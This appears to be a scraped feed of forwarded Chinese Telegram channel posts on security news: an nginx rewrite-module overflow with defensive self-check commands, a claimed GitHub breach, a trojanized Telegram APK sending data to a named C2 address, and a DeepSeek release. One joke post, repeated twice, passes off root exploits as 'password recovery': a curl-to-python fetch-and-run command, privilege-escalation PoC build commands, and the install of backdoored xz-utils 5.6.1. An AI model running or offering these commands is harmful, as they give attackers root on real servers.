Forwarded from Faker的个人频道
Nginx 被发现一个存在18年的内存损坏漏洞,可导致远程代码执行,利用门槛低
漏洞存在于每个通用发行版都会包含的rewrite模块
建议用户尽快更新至 1.30.1 / 1.31.0 版本
Ref: https://depthfirst.com/nginx-rift
漏洞存在于每个通用发行版都会包含的rewrite模块
ngx_http_rewrite_module ,影响开原版本Nginx 0.6.27至最近的1.30.0版本,在计算目标缓冲区大小时,使用的是原始字节长度,但在实际写入时,却进行了 URL 转义( + , % , & 等字符会扩展为 3 倍长度),溢出长度可控导致堆喷射建议用户尽快更新至 1.30.1 / 1.31.0 版本
Ref: https://depthfirst.com/nginx-rift
Forwarded from HAT's Public Channel |
快速自查:
# 1. 检查版本是否 >0.6.27, <1.30.1
nginx -v
# 2. 检查是否有 without-http_rewrite_module, 如果没有就算被影响
nginx -V 2>&1 | tr ' ' '\n' | grep -E 'rewrite|without-http_rewrite'
# 3. 遍历 nginx conf,查找所有可疑 rewrite
nginx -T 2>/dev/null | grep -nE '^[[:space:]]*rewrite[[:space:]]+[^[:space:]]+[[:space:]]+.*\$'
快速缓解:
1. 使用更加现代的 try_files 或 return 替代 rewrite
2. 增加缓解配置 (请根据业务调整):
http {
# 缩小客户端请求头和 URI 的缓冲区大小
client_header_buffer_size 1k;
# 阻止攻击者发送超长 Payload
large_client_header_buffers 2 4k;
# 其他配置...
}Forwarded from kMBRjund/0 🧊 (rpool/MBR)
1. Linux 找回密码教程,建议收藏!
curl https://copy.fail/exp python3 && su
passwd root
设置你的新密码
2. 你的 Linux 密码又忘了?
没关系,这里还有一个新的!
git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
3. 不想再忘记密码了?
我们有专业的黑客团队帮您运维服务器和保管密码!
项目地址: https://github.com/tukaani-project/xz/tree/v5.6.1
sudo apt install xz-utils=5.6.1-1
sudo systemctl restart ssh
4. 容易忘记密码的有福了,每天都有新办法!
https://ze3tar.github.io/post-zcrx.html
插入一个支持ZCRX的高端网卡,让它down掉,然后ptr_ring drain + scrub loop重复入栈把free_count写溢出即可
5. 什么,你买不起高端网卡?那试试这个吧!
git clone https://github.com/v12-security/pocs.git&& cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp
6. 听说您的机房不允许ssh外连,只能通过KVM物理访问服务器? 没关系,我们的专业黑客团队也可以通过nginx帮助运维您的服务器!
https://depthfirst.com/nginx-rift
curl https://copy.fail/exp python3 && su
passwd root
设置你的新密码
2. 你的 Linux 密码又忘了?
没关系,这里还有一个新的!
git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
3. 不想再忘记密码了?
我们有专业的黑客团队帮您运维服务器和保管密码!
项目地址: https://github.com/tukaani-project/xz/tree/v5.6.1
sudo apt install xz-utils=5.6.1-1
sudo systemctl restart ssh
4. 容易忘记密码的有福了,每天都有新办法!
https://ze3tar.github.io/post-zcrx.html
插入一个支持ZCRX的高端网卡,让它down掉,然后ptr_ring drain + scrub loop重复入栈把free_count写溢出即可
5. 什么,你买不起高端网卡?那试试这个吧!
git clone https://github.com/v12-security/pocs.git&& cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp
6. 听说您的机房不允许ssh外连,只能通过KVM物理访问服务器? 没关系,我们的专业黑客团队也可以通过nginx帮助运维您的服务器!
https://depthfirst.com/nginx-rift
Forwarded from 2.5次元日常 🍉
🗿3
Forwarded from zrj766的频道
Forwarded from 赛博安全威胁情报🥸
GitHub被黑,3800 个私有仓库泄露
黑客偷走了 3800 个核心内部仓库,github 官方确定了这事件,并指出员工设备被攻破导致,该事件涉及一个被污染的 VS Code 扩展
里面有Copilot的源码,CodeQL的算法,还有Actions运行时和整个计费系统。
https://x.com/github/status/2056949168208552080
#威胁情报 #吃瓜
黑客偷走了 3800 个核心内部仓库,github 官方确定了这事件,并指出员工设备被攻破导致,该事件涉及一个被污染的 VS Code 扩展
里面有Copilot的源码,CodeQL的算法,还有Actions运行时和整个计费系统。
https://x.com/github/status/2056949168208552080
#威胁情报 #吃瓜
🤯2
Forwarded from 秋风のとおり道
”当我看见原子弹的时候,我瘫坐DeepSeek V4上,仿佛看见了椅子爆炸“
DeepSeek V4发布咯,新增Pro版本的模型,参数量来到了1.6T,Flash版本也来到了 284B。
HuggingFace
分享来自 秋风のとおり道🍁
#AI
DeepSeek V4发布咯,新增Pro版本的模型,参数量来到了1.6T,Flash版本也来到了 284B。
HuggingFace
分享来自 秋风のとおり道
#AI
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from 每日沙雕墙 (投稿机器人 2.0)
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from 南宫雪珊
警告 apkpure 不可信
https://d.apkpure.com/b/XAPK/org.telegram.messenger?version=latest
Telegram商店版apk签名不正确。
https://d.apkpure.com/b/XAPK/org.thunderdog.challegram?version=latest
TelegramX包名不正确。
https://d.apkpure.com/b/XAPK/org.telegram.messenger.web?version=latest
目前仅web版正常,但版本也不是最新的。
https://d.apkpure.com/b/XAPK/org.telegram.messenger?version=latest
Telegram商店版apk签名不正确。
https://d.apkpure.com/b/XAPK/org.thunderdog.challegram?version=latest
TelegramX包名不正确。
https://d.apkpure.com/b/XAPK/org.telegram.messenger.web?version=latest
目前仅web版正常,但版本也不是最新的。
Forwarded from 科技圈🎗在花频道📮
APKPure 上的 Telegram 官方版被植入间谍后门
从 APKPure 下载的 Telegram 12.6.5 被重新签名打包,注入了名为 DataCollector 的间谍框架(
后门可窃取:全部聊天记录(含历史消息)、通讯录、手机相册、文档文件、GPS 定位、SIM 卡信息。数据经 AES-GCM 加密后上传至 C2 服务器
Eric Parker
via 群友
🌸 在花频道 · 备用频道 · 投稿通道
从 APKPure 下载的 Telegram 12.6.5 被重新签名打包,注入了名为 DataCollector 的间谍框架(
classes3.dex,3000+行代码)。后门可窃取:全部聊天记录(含历史消息)、通讯录、手机相册、文档文件、GPS 定位、SIM 卡信息。数据经 AES-GCM 加密后上传至 C2 服务器
38.190.225.166。Eric Parker
via 群友
🌸 在花频道 · 备用频道 · 投稿通道